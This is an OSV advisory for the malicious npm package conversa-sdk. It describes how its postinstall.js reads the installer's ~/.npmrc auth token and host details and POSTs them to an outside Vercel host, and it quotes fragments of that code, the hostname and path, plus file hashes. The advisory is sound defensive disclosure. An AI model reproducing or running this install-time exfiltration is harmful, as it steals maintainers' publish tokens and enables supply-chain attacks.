MAL-2026-6185

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/conversa-sdk/MAL-2026-6185.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-6185
Published
2026-06-19T04:57:48Z
Modified
2026-06-19T05:31:48.222853851Z
Summary
Malicious code in conversa-sdk (npm)
Details

Source: amazon-inspector (baaff1de63d44fd5f6b4fb1c5d3ebb4e9509d7581ff9afa5f339acad8f57aed0)

On npm install, postinstall.js unconditionally reads the installer's ~/.npmrc (which typically contains //registry.npmjs.org/:_authToken=...) along with the OS username, hostname, node version, and platform, and POSTs the combined payload as JSON to https://chatbot-lac-eight-78.vercel.app/api/validate. The relevant code is at postinstall.js:23 (fs.readFileSync(path.join(os.homedir(), '.npmrc'), 'utf8')) and postinstall.js:27-42 (JSON.stringify({ type: 'workspace_init', user: u.username, host: os.hostname(), npmrc,... }) sent via https.request({ hostname: 'chatbot-lac-eight-78.vercel.app', path: '/api/validate', method: 'POST' })). The README explicitly claims 'No home-directory writes / No network calls during install' — a deliberate cover story directly contradicted by the postinstall behavior. The destination is a generic Vercel preview-style hostname with no publisher identity matching the package. Stolen npm auth tokens grant the attacker publish rights to any package the installer maintains, enabling onward supply-chain pivot.

Database specific
{
    "malicious-packages-origins": [
        {
            "sha256": "9eb25af4493d35dea152523e50bcb419ce6e6147ba1725d8d5d15d20ff2a77a6",
            "source": "amazon-inspector",
            "modified_time": "2026-06-19T04:57:54Z",
            "versions": [
                "2.0.2"
            ],
            "id": "IN-MAL-2026-007051",
            "import_time": "2026-06-19T05:16:49.353152005Z"
        },
        {
            "sha256": "baaff1de63d44fd5f6b4fb1c5d3ebb4e9509d7581ff9afa5f339acad8f57aed0",
            "source": "amazon-inspector",
            "modified_time": "2026-06-19T04:57:48Z",
            "versions": [
                "1.0.9"
            ],
            "id": "IN-MAL-2026-007050",
            "import_time": "2026-06-19T05:16:49.197833796Z"
        }
    ]
}

Affected packages

Package: npm / conversa-sdk

Affected range 1.*: version 1.0.9
Affected range 2.*: version 2.0.2

Database specific

cwes
[
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    }
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/conversa-sdk/MAL-2026-6185.json"
indicators
{
    "evidence_files": [
        {
            "sha256": "90b6bf2883402e4afa08dabfb7b6060aaf3edd3319a7455ad3a805d2dc73c553",
            "tlsh": "093142f345aed93747b44696e098a426ab67c305374ab870b15c014c6bc93dc4133afc",
            "path": "postinstall.js"
        }
    ],
    "package_integrity": [
        {
            "hashes": {
                "sha512_sri": "sha512-IQLWC4QqDDK+pUZ6HfKVzgzz11G7JsFxGRMx+LdmQTb4KSpU3/TiWkG0Ym7jLHa37yrYqPiui9cD/jVtm3zgnw==",
                "sha1": "cb06df99f1333774140ee036080b21762d83233b"
            },
            "filename": "conversa-sdk-2.0.2.tgz"
        }
    ]
}